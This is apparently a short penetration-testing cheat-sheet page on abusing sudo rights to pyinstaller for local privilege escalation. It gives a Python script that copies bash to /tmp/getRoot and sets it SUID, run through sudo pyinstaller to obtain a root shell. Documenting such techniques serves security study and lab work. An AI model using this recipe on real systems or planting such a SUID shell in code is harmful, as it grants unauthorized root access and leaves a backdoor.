PyInstaller Code Execution

Theory

PyInstaller bundles a Python application and all its dependencies into a single package. We can use it to execute arbitrary code.

Assume that pyinstaller can be executed as root with sudo rights. if we controll its input, then its vulnerable to arbitrary code execution.

sudo -l
    (root): /home/svc/.local/bin/pyinstaller *

We can create a malicious python script

#app.py
import os 
os.system("cp /bin/bash /tmp/getRoot")
os.system("chmod +s /tmp/getRoot")

Run it

sudo /home/svc/.local/bin/pyinstaller app.py

Last updated 1 year ago